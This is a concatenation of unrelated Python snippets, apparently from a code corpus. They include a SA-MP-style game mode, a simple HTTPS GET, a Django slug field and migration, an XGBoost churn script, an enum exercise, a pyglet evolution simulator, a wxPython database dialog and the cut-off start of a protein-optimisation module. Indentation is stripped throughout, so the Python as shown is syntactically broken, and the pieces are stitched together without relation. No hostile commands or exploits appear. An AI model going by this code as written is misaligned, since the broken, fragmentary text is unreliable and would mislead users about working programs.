LoadStaticVehiclesFromFile("scriptfiles/vehicles/pilots.txt") +
# Las Venturas
LoadStaticVehiclesFromFile("scriptfiles/vehicles/lv_law.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/lv_airport.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/lv_gen.txt") +
# San fierro
LoadStaticVehiclesFromFile("scriptfiles/vehicles/sf_law.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/sf_airport.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/sf_gen.txt") +
# Los Santos
LoadStaticVehiclesFromFile("scriptfiles/vehicles/ls_law.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/ls_airport.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/ls_gen_inner.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/ls_gen_outer.txt") +
# Other areas
LoadStaticVehiclesFromFile("scriptfiles/vehicles/whetstone.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/bone.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/flint.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/tierra.txt") +
LoadStaticVehiclesFromFile("scriptfiles/vehicles/red_county.txt"))
print("Total vehicles from files: {}".format(total_vehicles_from_files))
return True
def OnGameModeExit():
return True
def OnPlayerConnect(playerid):
GameTextForPlayer(playerid,"~w~Grand Larceny",3000,4)
SendClientMessage(playerid,COLOR_WHITE,"Welcome to Grand Larceny")
_player_obj = Player(playerid, -1, False, GetTickCount())
players.append(_player_obj)
return True
def OnPlayerDisconnect(playerid, reason):
for player in players:
if player.playerid == playerid:
players.remove(player)
break
return True
def OnPlayerSpawn(playerid):
if IsPlayerNPC(playerid):
return True
randspawn = 0
SetPlayerInterior(playerid, 0)
TogglePlayerClock(playerid, 0)
ResetPlayerMoney(playerid)
GivePlayerMoney(playerid, 30000)
for player in players:
if player.playerid == playerid:
player.has_city_selected = False
if player.city_selection == CITY_LOS_SANTOS:
randspawn = random.randint(0, len(gRandomSpawns_LosSantos))
SetPlayerPos(playerid,
gRandomSpawns_LosSantos[randspawn][0],
gRandomSpawns_LosSantos[randspawn][1],
gRandomSpawns_LosSantos[randspawn][2]
)
elif player.city_selection == CITY_SAN_FIERRO:
randspawn = random.randint(0, len(gRandomSpawns_SanFierro))
SetPlayerPos(playerid,
gRandomSpawns_SanFierro[randspawn][0],
gRandomSpawns_SanFierro[randspawn][1],
gRandomSpawns_SanFierro[randspawn][2]
)
elif player.city_selection == CITY_LAS_VENTURAS:
randspawn = random.randint(0, len(gRandomSpawns_LasVenturas))
SetPlayerPos(playerid,
gRandomSpawns_LasVenturas[randspawn][0],
gRandomSpawns_LasVenturas[randspawn][1],
gRandomSpawns_LasVenturas[randspawn][2]
)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_PISTOL"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_PISTOL_SILENCED"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_DESERT_EAGLE"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SHOTGUN"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SAWNOFF_SHOTGUN"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SPAS12_SHOTGUN"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_MICRO_UZI"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_MP5"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_AK47"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_M4"),200)
SetPlayerSkillLevel(playerid,Const("WEAPONSKILL_SNIPERRIFLE"),200)
GivePlayerWeapon(playerid,22,100) # Colt 45
return True
def OnPlayerDeath(playerid, killerid, reason):
if killerid == 65535:
ResetPlayerMoney(playerid)
else:
GivePlayerMoney(killerid, GetPlayerMoney(playerid))
ResetPlayerMoney(playerid)
return True
# Used to init textdraws of city names
def ClassSel_InitCityNameText(txtInit):
global txtClassSelHelper
TextDrawUseBox(txtInit, 0)
TextDrawLetterSize(txtInit,1.25,3.0)
TextDrawFont(txtInit, 0)
TextDrawSetShadow(txtInit,0)
TextDrawSetOutline(txtInit,1)
TextDrawColor(txtInit,4008636159)
TextDrawBackgroundColor(txtClassSelHelper,255)
return
def ClassSel_InitTextDraws():
global txtLosSantos
global txtSanFierro
global txtLasVenturas
global txtClassSelHelper
# Init our observer helper text display
txtLosSantos = TextDrawCreate(10.0, 380.0, "Los Santos")
ClassSel_InitCityNameText(txtLosSantos)
txtSanFierro = TextDrawCreate(10.0, 380.0, "San Fierro")
ClassSel_InitCityNameText(txtSanFierro)
txtLasVenturas = TextDrawCreate(10.0, 380.0, "Las Venturas")
ClassSel_InitCityNameText(txtLasVenturas)
# Init our observer helper text display
txtClassSelHelper = TextDrawCreate(10.0, 415.0,
" Press ~b~~k~~GO_LEFT~ ~w~or ~b~~k~~GO_RIGHT~ ~w~to switch cities.~n~ Press ~r~~k~~PED_FIREWEAPON~ ~w~to select.")
TextDrawUseBox(txtClassSelHelper, 1)
TextDrawBoxColor(txtClassSelHelper,572662459)
TextDrawLetterSize(txtClassSelHelper,0.3,1.0)
TextDrawTextSize(txtClassSelHelper,400.0,40.0)
TextDrawFont(txtClassSelHelper, 2)
TextDrawSetShadow(txtClassSelHelper,0)
TextDrawSetOutline(txtClassSelHelper,1)
TextDrawBackgroundColor(txtClassSelHelper,255)
TextDrawColor(txtClassSelHelper,4294967295)
return
def ClassSel_SetupCharSelection(playerid):
for player in players:
if player.playerid == playerid:
if player.city_selection == CITY_LOS_SANTOS:
SetPlayerInterior(playerid,11)
SetPlayerPos(playerid,508.7362,-87.4335,998.9609)
SetPlayerFacingAngle(playerid,0.0)
SetPlayerCameraPos(playerid,508.7362,-83.4335,998.9609)
SetPlayerCameraLookAt(playerid,508.7362,-87.4335,998.9609)
elif player.city_selection == CITY_SAN_FIERRO:
SetPlayerInterior(playerid,3)
SetPlayerPos(playerid,-2673.8381,1399.7424,918.3516)
SetPlayerFacingAngle(playerid,181.0)
SetPlayerCameraPos(playerid,-2673.2776,1394.3859,918.3516)
SetPlayerCameraLookAt(playerid,-2673.8381,1399.7424,918.3516)
elif player.city_selection == CITY_LAS_VENTURAS:
SetPlayerInterior(playerid,3)
SetPlayerPos(playerid,349.0453,193.2271,1014.1797)
SetPlayerFacingAngle(playerid,286.25)
SetPlayerCameraPos(playerid,352.9164,194.5702,1014.1875)
SetPlayerCameraLookAt(playerid,349.0453,193.2271,1014.1797)
break
return
def ClassSel_SetupSelectedCity(playerid):
global txtLosSantos
global txtSanFierro
global txtLasVenturas
for player in players:
if player.playerid == playerid:
if player.city_selection == -1:
player.city_selection = CITY_LOS_SANTOS
if player.city_selection == CITY_LOS_SANTOS:
SetPlayerInterior(playerid,0)
SetPlayerCameraPos(playerid,1630.6136,-2286.0298,110.0)
SetPlayerCameraLookAt(playerid,1887.6034,-1682.1442,47.6167)
TextDrawShowForPlayer(playerid,txtLosSantos)
TextDrawHideForPlayer(playerid,txtSanFierro)
TextDrawHideForPlayer(playerid,txtLasVenturas)
elif player.city_selection == CITY_SAN_FIERRO:
SetPlayerInterior(playerid,0)
SetPlayerCameraPos(playerid,-1300.8754,68.0546,129.4823)
SetPlayerCameraLookAt(playerid,-1817.9412,769.3878,132.6589)
TextDrawHideForPlayer(playerid,txtLosSantos)
TextDrawShowForPlayer(playerid,txtSanFierro)
TextDrawHideForPlayer(playerid,txtLasVenturas)
elif player.city_selection == CITY_LAS_VENTURAS:
SetPlayerInterior(playerid,0)
SetPlayerCameraPos(playerid,1310.6155,1675.9182,110.7390)
SetPlayerCameraLookAt(playerid,2285.2944,1919.3756,68.2275)
TextDrawHideForPlayer(playerid,txtLosSantos)
TextDrawHideForPlayer(playerid,txtSanFierro)
TextDrawShowForPlayer(playerid,txtLasVenturas)
break
return
def ClassSel_SwitchToNextCity(playerid):
for player in players:
if player.playerid == playerid:
player.last_city_selection_tick = GetTickCount()
player.city_selection += 1
if player.city_selection > CITY_LAS_VENTURAS:
player.city_selection = CITY_LOS_SANTOS
break
PlayerPlaySound(playerid,1052,0.0,0.0,0.0)
ClassSel_SetupSelectedCity(playerid)
return
def ClassSel_SwitchToPreviousCity(playerid):
for player in players:
if player.playerid == playerid:
player.last_city_selection_tick = GetTickCount()
player.city_selection -= 1
if player.city_selection < CITY_LOS_SANTOS:
player.city_selection = CITY_LAS_VENTURAS
break
PlayerPlaySound(playerid,1053,0.0,0.0,0.0)
ClassSel_SetupSelectedCity(playerid)
return
def ClassSel_HandleCitySelection(playerid):
global txtLosSantos
global txtSanFierro
global txtLasVenturas
global txtClassSelHelper
(Keys, ud, lr) = GetPlayerKeys(playerid)
for player in players:
if player.playerid == playerid:
# only allow selection every ~500 ms
if GetTickCount() - player.last_city_selection_tick < 500:
break
if player.city_selection == -1 :
ClassSel_SwitchToNextCity(playerid)
break
if Keys & 4 :
player.has_city_selected = True
TextDrawHideForPlayer(playerid,txtClassSelHelper)
TextDrawHideForPlayer(playerid,txtLosSantos)
TextDrawHideForPlayer(playerid,txtSanFierro)
TextDrawHideForPlayer(playerid,txtLasVenturas)
TogglePlayerSpectating(playerid,False)
if lr > 0 :
ClassSel_SwitchToNextCity(playerid)
elif lr < 0 :
ClassSel_SwitchToPreviousCity(playerid)
break
return True
def OnPlayerText(playerid, text):
return True
def OnPlayerRequestClass(playerid, classid):
if IsPlayerNPC(playerid):
return True
global txtClassSelHelper
for player in players:
if player.playerid == playerid:
if player.has_city_selected == True:
ClassSel_SetupCharSelection(playerid)
return True
else:
if GetPlayerState(playerid) != Const("PLAYER_STATE_SPECTATING"):
SpawnPlayer(playerid) # Why?
#Else player does not load in correctly and the toggle below will disconnect the player.
# Read the known issues on our repo wiki.
TogglePlayerSpectating(playerid, 1)
TextDrawShowForPlayer(playerid, txtClassSelHelper)
player.city_selection = -1
return True
def OnPlayerUpdate(playerid):
if IsPlayerConnected(playerid) == False:
return False
if IsPlayerNPC(playerid):
return True
for player in players:
if player.playerid == playerid:
if ( player.has_city_selected == False and
GetPlayerState(playerid) == Const("PLAYER_STATE_SPECTATING") ):
ClassSel_HandleCitySelection(playerid)
if GetPlayerInterior(playerid) != 0 and GetPlayerWeapon(playerid) != 0:
SetPlayerArmedWeapon(playerid, 0) # Fists
return False #No syncing until they change their weapon
if GetPlayerWeapon(playerid) == 38 or GetPlayerSpecialAction(playerid) == 2: #minigun and jetpack not allowed
Kick(playerid)
return False
return True
| StarcoderdataPython |
358212 | #!/usr/bin/env python
import httplib
connection = httplib.HTTPSConnection("www.google.com", 443)
connection.request("GET", "/")
response = connection.getresponse()
print response.status
data = response.read()
print data
| StarcoderdataPython |
6440067 | <reponame>SectorLabs/django-localized-fields
from datetime import datetime
from django.core.exceptions import ImproperlyConfigured
from django.utils.text import slugify
from ..mixins import AtomicSlugRetryMixin
from ..util import get_language_codes
from ..value import LocalizedValue
from .autoslug_field import LocalizedAutoSlugField
class LocalizedUniqueSlugField(LocalizedAutoSlugField):
"""Automatically provides slugs for a localized field upon saving.".
An improved version of :see:LocalizedAutoSlugField,
which adds:
- Concurrency safety
- Improved performance
When in doubt, use this over :see:LocalizedAutoSlugField.
Inherit from :see:AtomicSlugRetryMixin in your model to
make this field work properly.
By default, this creates a new slug if the field(s) specified
in `populate_from` are changed. Set `immutable=True` to get
immutable slugs.
"""
def __init__(self, *args, **kwargs):
"""Initializes a new instance of :see:LocalizedUniqueSlugField."""
kwargs["uniqueness"] = kwargs.pop("uniqueness", get_language_codes())
self.enabled = kwargs.pop("enabled", True)
self.immutable = kwargs.pop("immutable", False)
super(LocalizedUniqueSlugField, self).__init__(*args, **kwargs)
self.populate_from = kwargs.pop("populate_from")
self.include_time = kwargs.pop("include_time", False)
def deconstruct(self):
"""Deconstructs the field into something the database can store."""
name, path, args, kwargs = super(
LocalizedUniqueSlugField, self
).deconstruct()
kwargs["populate_from"] = self.populate_from
kwargs["include_time"] = self.include_time
if self.enabled is False:
kwargs["enabled"] = self.enabled
if self.immutable is True:
kwargs["immutable"] = self.immutable
return name, path, args, kwargs
def pre_save(self, instance, add: bool):
"""Ran just before the model is saved, allows us to built the slug.
Arguments:
instance:
The model that is being saved.
add:
Indicates whether this is a new entry
to the database or an update.
Returns:
The localized slug that was generated.
"""
if not self.enabled:
return getattr(instance, self.name)
if not isinstance(instance, AtomicSlugRetryMixin):
raise ImproperlyConfigured(
(
"Model '%s' does not inherit from AtomicSlugRetryMixin. "
"Without this, the LocalizedUniqueSlugField will not work."
)
% type(instance).__name__
)
slugs = LocalizedValue()
for lang_code, value in self._get_populate_values(instance):
if not value:
continue
slug = slugify(value, allow_unicode=True)
current_slug = getattr(instance, self.name).get(lang_code)
if current_slug and self.immutable:
slugs.set(lang_code, current_slug)
continue
# verify whether it's needed to re-generate a slug,
# if not, re-use the same slug
if instance.pk is not None:
if current_slug is not None:
current_slug_end_index = current_slug.rfind("-")
stripped_slug = current_slug[0:current_slug_end_index]
if slug == stripped_slug:
slugs.set(lang_code, current_slug)
continue
if self.include_time:
slug += "-%d" % datetime.now().microsecond
retries = getattr(instance, "retries", 0)
if retries > 0:
# do not add another - if we already added time
if not self.include_time:
slug += "-"
slug += "%d" % retries
slugs.set(lang_code, slug)
setattr(instance, self.name, slugs)
return slugs
| StarcoderdataPython |
386294 | import catboost
from catboost import CatBoostClassifier
from xgboost import XGBClassifier
import gc
from sklearn.linear_model import LogisticRegression
from sklearn import preprocessing
import pandas as pd
import numpy as np
#add
#stopping dev due to xgboost issues
df_train_data = pd.read_csv('data\\full_train.csv',nrows=10000)
print(len(df_train_data))
df_train = pd.read_csv('data\\train.csv')
df_train2 = pd.read_csv('data\\train_v2.csv')
df_train = df_train.append(df_train2)
del df_train2
gc.collect()
target = df_train['is_churn']
target = target[0:9999]
print('\nTraining Data columns\n', df_train_data.columns)
df_train_data = df_train_data.drop(['Unnamed: 0','date'], axis=1)
df_train_data = df_train_data.fillna(0)
print(df_train_data.head(5))
test = pd.read_csv('data\\full_test.csv')
print(len(test))
for col in df_train_data.select_dtypes(include=['object']).columns:
df_train_data[col] = df_train_data[col].astype('category')
test[col] = test[col].astype('category')
# Encoding categorical features
for col in df_train_data.select_dtypes(include=['category']).columns:
df_train_data[col] = df_train_data[col].cat.codes
test[col] = test[col].cat.codes
xgb = XGBClassifier(max_depth=4, n_estimators=300, learning_rate=0.05)
xgb.fit(df_train, target)
print('xggboost score', xgb.score(df_train_data, target))
#predictions = gbm.predict(test_X)
| StarcoderdataPython |
9771500 | <reponame>lleej/python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
'枚举类的练习'
__author__ = 'Jacklee'
# 导入模块
#import types
# 月份常量
JAN = 1
FEB = 2
MAR = 3
# 枚举类
from enum import Enum, unique
## 第一种定义方式
@unique
class Month(Enum):
JAN = 0
FEB = 1
MAR = 2
## 第二种定义方式
WeekDay = Enum('WeekDay', ('Mon', 'Tue', 'Wed', 'Tru', 'Fri', 'Sat', 'Sun'))
## 类的组成,JAN ... 是一个类成员
print('Month类的成员: ', dir(Month))
m = Month(0)
print(m.name, m.value)
print('Month对象实例的成员: ', dir(m))
m = Month(1)
print(m.name, m.value)
m = Month(2)
print(m.name, m.value)
| StarcoderdataPython |
3534383 | # Generated by Django 3.1.3 on 2021-01-11 22:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hackathon', '0024_auto_20201103_2114'),
]
operations = [
migrations.AlterModelOptions(
name='hackteam',
options={'verbose_name': 'Hack Team', 'verbose_name_plural': 'Hack Teams'},
),
migrations.AlterField(
model_name='hackathon',
name='status',
field=models.CharField(choices=[('draft', 'Draft'), ('published', 'Published'), ('registration_open', 'Registration Open'), ('hack_in_progress', 'Hackathon In Progress'), ('judging', 'Judging'), ('finished', 'Hackathon Finished'), ('deleted', 'Deleted')], default='draft', max_length=20),
),
migrations.AlterUniqueTogether(
name='hackteam',
unique_together={('display_name', 'hackathon')},
),
]
| StarcoderdataPython |
1698709 | <reponame>TheInitializer/evolution_simulator<gh_stars>1-10
from pyglet.sprite import Sprite
import pyglet
from dna_parser import parse_dna, distance
import dna_parser
import random
from config import window_width, window_height
import food
import mutation
creatures = []
class Creature(Sprite):
signal = 0
attacking = False
cool = False
def __init__(self, mutability_chance: int, creature_number: int,
max_health: int, speed: int, dna: str, init_x: int,
init_y: int):
self.mutability_chance = mutability_chance
self.creature_number = creature_number
self.max_health = int((max_health / 100) * 50)
self.relative_max_health = max_health
self.speed = int((speed / 100) * 10)
self.relative_speed = speed
self.dna = dna
self.health = self.max_health
self.pos = (init_x, init_y)
pyglet.resource.path = ["resources"]
pyglet.resource.reindex()
creature = pyglet.resource.image("creature.png")
super().__init__(creature, x=init_x, y=init_y)
self.label = pyglet.text.Label(str(self.health),
font_name='Times New Roman',
font_size=16,
x=self.x, y=self.y,
anchor_x='center', anchor_y='center')
def say_hi(self):
print("hi")
def do_stuff(self, other_creatures, foods):
global creatures
if self.cool: self.say_hi()
# initialize
nearest = dna_parser.nearest(self, other_creatures)
nearest_food = dna_parser.nearest(self, foods)
self.votes = {
"up": 0,
"left": 0,
"right": 0,
"down": 0
}
# parse the dna
try:
exec(parse_dna(self.dna, other_creatures))
except:
# Syntax errors are terminal diseases.
# Kill the creature to put it out of its misery
creatures.remove(self)
#del(self)
#return
pass
# don't fall off the edge
while True:
mv = max(self.votes.values())
direction = random.choice(
[k for (k, v) in self.votes.items() if v == mv])
if ((direction == "up" and self.y + self.speed >= window_height-16) or
(direction == "down" and self.y - self.speed <= 16) or
(direction == "left" and self.x - self.speed <= 16) or
(direction == "right" and self.x + self.speed >= window_width-16)):
del self.votes[direction]
else:
break
if self.cool: print("direction:", direction)
if self.cool: print("speed:", self.speed)
# move
if direction == "up":
if self.cool: print("going up")
self.y += self.speed
elif direction == "down":
self.y -= self.speed
elif direction == "right":
self.x += self.speed
elif direction == "left":
self.x -= self.speed
# eat food
if (nearest_food.x - 24 < self.x < nearest_food.x + 24 and
nearest_food.y - 24 < self.y < nearest_food.y + 24):
del foods[foods.index(nearest_food)]
foods.append(food.Food(
random.randint(0, window_width),
random.randint(0, window_height)))
if self.health < self.max_health:
self.health += 1
# eat fellow creatures
if (self.attacking and
nearest.x - 24 < self.x < nearest.x + 24 and
nearest.y - 24 < self.y < nearest.y + 24):
other_creatures[other_creatures.index(nearest)].health -= 1
if other_creatures[other_creatures.index(nearest)].health <= 0:
other_creatures.remove(other_creatures[other_creatures.index(nearest)])
self.health += 4
if self.health > self.max_health: self.health = self.max_health
self.label = pyglet.text.Label(str(int(self.health)),
font_name='Times New Roman',
font_size=16,
x=self.x, y=self.y,
anchor_x='center', anchor_y='center')
self.health -= 0.1
def give_birth(self):
global creatures
if self.health >= self.max_health / 2 and "random.random() > 0.7":
creatures.append(Creature(
self.mutability_chance, self.creature_number, self.relative_max_health/2,
self.relative_speed, mutation.mutate(self.dna),
random.randint(16, window_width - 16),
random.randint(16, window_height - 16)
))
self.health = self.health//2
| StarcoderdataPython |
6540773 | <gh_stars>0
n=sum(list(map(int,input().split())))
if n%5 or n==0:
print(-1)
else:
print(n//5)
| StarcoderdataPython |
1940004 |
import pytest
from discord.ext.test import message, verify_message, verify_embed, verify_file
pytestmark = pytest.mark.usefixtures("testlos_m")
async def test_aesthetic():
await message("^aesthetic Sphinx of black quartz, judge my vow")
verify_message("Sphinx of black quartz, judge my vow")
async def test_catpic():
await message("^catpic")
verify_file()
async def test_favor():
await message("^favor")
verify_message("I'm afraid I can't do that, TestUser.")
async def test_hi():
await message("^hi")
verify_message("Hello there TestUser")
async def test_xkcd():
await message("^xkcd")
verify_embed()
async def test_smbc():
await message("^smbc")
verify_embed()
async def test_tvtropes():
await message("^tvtropes ImprovisedGolems")
verify_message()
await message("^tvtropes Sugar/GeniusProgramming")
verify_message("That trope or media page appears to not exist", equals=False)
| StarcoderdataPython |
1947204 | from typing import Dict, List
from numpy import ndarray, zeros
import plotly.graph_objects as go
from bayesian_mmm.spend_transformation.spend_transformation import (
compute_hill,
compute_reach
)
class DiminushingReturnsVisualizor:
def __init__(self, param_nm_to_val: Dict, media_nms: List[str]) -> None:
if "ec" in param_nm_to_val.keys():
self.__transfo_func = compute_hill
self.__transfo_params = {
"ecs":param_nm_to_val["ec"],
"slopes":param_nm_to_val["slope"]
}
else:
self.__transfo_func = compute_reach
self.__transfo_params = {"half_saturations":param_nm_to_val["half_saturation"]}
self.__media_nms = media_nms
def write_fig(self, spends: ndarray, name: str) -> None:
transformed_spends = self.__transfo_func(spends, **self.__transfo_params)
fig = go.Figure()
for media_index, media_nm in enumerate(self.__media_nms):
trace_data = zeros((spends.shape[0], 2))
trace_data[:,0] = spends[:,media_index]
trace_data[:,1] = transformed_spends[:,media_index]
trace_data = trace_data[trace_data[:,0].argsort()]
fig.add_trace(
go.Scatter(
x = trace_data[:,0],
y = trace_data[:,1],
name = media_nm
)
)
fig.write_html("results/plot/diminushing_returns_%s.html" % name, auto_open=False) | StarcoderdataPython |
8126783 | <filename>ProjectInfo/tools/FeaturesToPoint.py
'''-------------------------------------------------------------------------------
Tool Name: FeaturesToPoint
Source Name: FeaturesToPoint.py
Version: ArcGIS 10.1
License: Apache 2.0
Author: <NAME>
Updated by: <NAME>
Description: Description: Creates a Points Features of true centroid from feature layer.
History: Initial coding - 16/09/2018, version 1.0
Updated:
-------------------------------------------------------------------------------'''
import arcpy
class FeaturesToPoint(object):
def __init__(self):
"""Define the tool (tool name is the name of the class)."""
self.label = "Features To Point"
self.description = "Creates a Points Features of true centroid from feature layer."
self.canRunInBackground = False
self.category = "Data Management"
def getParameterInfo(self):
"""Define parameter definitions"""
param0 = arcpy.Parameter(name="in_layer",
displayName="Feature Layer",
direction="Input",
parameterType="Required",
datatype="GPFeatureLayer")
param1 = arcpy.Parameter(name="out_layer",
displayName="Output Layer",
direction="Output",
parameterType="Required",
datatype="GPFeatureLayer")
params = [param0, param1]
return params
def isLicensed(self):
"""Set whether tool is licensed to execute."""
return True
def updateParameters(self, parameters):
"""Modify the values and properties of parameters before internal
validation is performed. This method is called whenever a parameter
has been changed."""
return
def updateMessages(self, parameters):
"""Modify the messages created by internal validation for each tool
parameter. This method is called after internal validation."""
return
def execute(self, parameters, messages):
"""The source code of the tool."""
in_layer = parameters[0].valueAsText
out_layer = parameters[1].valueAsText
geometries_list = arcpy.CopyFeatures_management(in_layer, arcpy.Geometry())
result_geometry = [arcpy.PointGeometry(polygon.centroid) for polygon in geometries_list]
return arcpy.SpatialJoin_analysis(result_geometry, in_layer, out_layer)
| StarcoderdataPython |
175681 | <filename>img_upload/config.py
import os
S3_BUCKET = ""
S3_KEY = ""
S3_SECRET = ""
S3_LOCATION = 'http://{}.s3.amazonaws.com/'.format(S3_BUCKET)
DEBUG = True
PORT = 5000 | StarcoderdataPython |
11374963 | <reponame>alvarosanz/loadit
import wx
import os
from loadit.misc import humansize
from loadit.gui.table_info_dialog import TableInfoDialog
class DatabaseInfoDialog(wx.Dialog):
def __init__(self, parent, database, active_tab=0):
super().__init__(parent)
self.database = database
self.SetTitle('Database Info')
self.SetSize((640, 480))
sizer = wx.BoxSizer(wx.VERTICAL)
sizer.Add(-1, 8)
# General info
field_sizer = wx.BoxSizer(wx.HORIZONTAL)
field_sizer.Add(wx.StaticText(self, label='Name:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
field_sizer.Add(wx.TextCtrl(self, value=os.path.basename(database.path), style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
field_sizer = wx.BoxSizer(wx.HORIZONTAL)
field_sizer.Add(wx.StaticText(self, label='Size:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
field_sizer.Add(wx.TextCtrl(self, value=humansize(database.header.nbytes), style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
if database.header.batches:
field_sizer = wx.BoxSizer(wx.HORIZONTAL)
field_sizer.Add(wx.StaticText(self, label='Date:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
field_sizer.Add(wx.TextCtrl(self, value=database.header.batches[-1][2], style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
field_sizer = wx.BoxSizer(wx.HORIZONTAL)
field_sizer.Add(wx.StaticText(self, label='Hash:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
field_sizer.Add(wx.TextCtrl(self, value=database.header.batches[-1][1], style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
field_sizer = wx.BoxSizer(wx.HORIZONTAL)
field_sizer.Add(wx.StaticText(self, label='Version:', size=(50, -1)), 0, wx.RIGHT + wx.ALIGN_LEFT, 5)
field_sizer.Add(wx.TextCtrl(self, value=database.header.version, style=wx.TE_READONLY), 1, wx.LEFT + wx.EXPAND, 5)
sizer.Add(field_sizer, 0, wx.LEFT + wx.RIGHT + wx.TOP + wx.EXPAND, 15)
sizer.Add(-1, 8)
notebook = wx.Notebook(self)
# Tables
panel = wx.Panel(notebook, id=wx.ID_ANY)
panel_sizer = wx.BoxSizer(wx.VERTICAL)
self.tables = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
self.tables.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.show_menu)
self.tables.InsertColumn(0, 'Table', width=250)
self.tables.InsertColumn(1, 'Size', width=100)
self.tables.InsertColumn(2, 'Fields', width=50)
self.tables.InsertColumn(3, 'IDs', width=80)
self.tables.InsertColumn(4, 'LIDs', width=80)
for i, table in enumerate(database.header.tables.values()):
self.tables.InsertItem(i, table['name'])
self.tables.SetItem(i, 1, humansize(database.header.get_size(table['name'])))
self.tables.SetItem(i, 2, str(len(table['columns'][2:])))
self.tables.SetItem(i, 3, str(len(table['IDs'])))
self.tables.SetItem(i, 4, str(len(table['LIDs'])))
panel_sizer.Add(self.tables, 1, wx.ALL + wx.EXPAND, 5)
panel.SetSizer(panel_sizer)
notebook.AddPage(panel, 'Tables ({})'.format(len(database.header.tables)))
# Batches
panel = wx.Panel(notebook, id=wx.ID_ANY)
panel_sizer = wx.BoxSizer(wx.VERTICAL)
self.batches = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
self.batches.InsertColumn(0, 'Batch', width=250)
self.batches.InsertColumn(1, 'Size', width=100)
self.batches.InsertColumn(2, 'Date', width=170)
self.batches.InsertColumn(3, 'Hash', width=80)
self.batches.InsertColumn(4, 'Comment', width=400)
for i, (batch, batch_hash, date, _, comment) in enumerate(database.header.batches):
self.batches.InsertItem(i, batch)
self.batches.SetItem(i, 1, humansize(database.header.get_batch_size(batch)))
self.batches.SetItem(i, 2, date)
self.batches.SetItem(i, 3, batch_hash)
self.batches.SetItem(i, 4, comment)
panel_sizer.Add(self.batches, 1, wx.ALL + wx.EXPAND, 5)
panel.SetSizer(panel_sizer)
notebook.AddPage(panel, 'Batches ({})'.format(len(database.header.batches)))
# Attachments
panel = wx.Panel(notebook, id=wx.ID_ANY)
panel_sizer = wx.BoxSizer(wx.VERTICAL)
self.attachments = wx.ListCtrl(panel, wx.ID_ANY, style=wx.LC_REPORT + wx.LC_SINGLE_SEL)
self.attachments.InsertColumn(0, 'Attachment', width=250)
self.attachments.InsertColumn(1, 'Size', width=100)
for i, (attachment, (_, nbytes)) in enumerate(database.header.attachments.items()):
self.attachments.InsertItem(i, attachment)
self.attachments.SetItem(i, 1, humansize(nbytes))
panel_sizer.Add(self.attachments, 1, wx.ALL + wx.EXPAND, 5)
panel.SetSizer(panel_sizer)
notebook.AddPage(panel, 'Attachments ({})'.format(len(database.header.attachments)))
notebook.ChangeSelection(active_tab)
sizer.Add(notebook, 1, wx.ALL + wx.EXPAND, 5)
self.SetSizer(sizer)
def show_menu(self, event):
popupmenu = wx.Menu()
menu_item = popupmenu.Append(wx.ID_ANY, 'Show Info')
self.tables.Bind(wx.EVT_MENU, self.table_info, menu_item)
self.tables.PopupMenu(popupmenu, event.GetPoint())
def table_info(self, event):
with TableInfoDialog(self, self.database.header.tables[self.tables.GetItemText(self.tables.GetFocusedItem())], self.database) as dialog:
dialog.ShowModal() | StarcoderdataPython |
3560673 | <gh_stars>0
from card import Card
class Player:
name : str
card : Card
def __init__(self, name, card):
self.name = name
self.card = card
| StarcoderdataPython |
3306669 | <reponame>ec1340/ReLSO-Guided-Generative-Protein-Design-using-Regularized-Transformers<filename>relso/optim/optim_algs.py
"""
Optimization algorithms
"""
import numpy as np
import numpy.ma as ma
import numpy.linalg as LA
import copy
from tqdm import tqdm
from scipy.spatial import distance
from sklearn.neighbors import NearestNeighbors
import torch
import torch.nn as nn
"""
def grad_free_optimizer(initial_sequence, oracle, N):
...
optimization step
...
return opm
"""
######################
# Gradient Free Methods
######################
def eval_oracle(data_point, oracle):
data_point = torch.Tensor(data_point).reshape(1,-1)
# print("data point shape: {}".format(data_point.shape))
with torch.no_grad():
fit_value = oracle(data_point).squeeze().item()
# print("fitness value: {}".format(fit_value))
return fit_value
######################
# Directed Evolution
######################
def directed_evolution_sequence(initial_sequence, model, positions):
"""
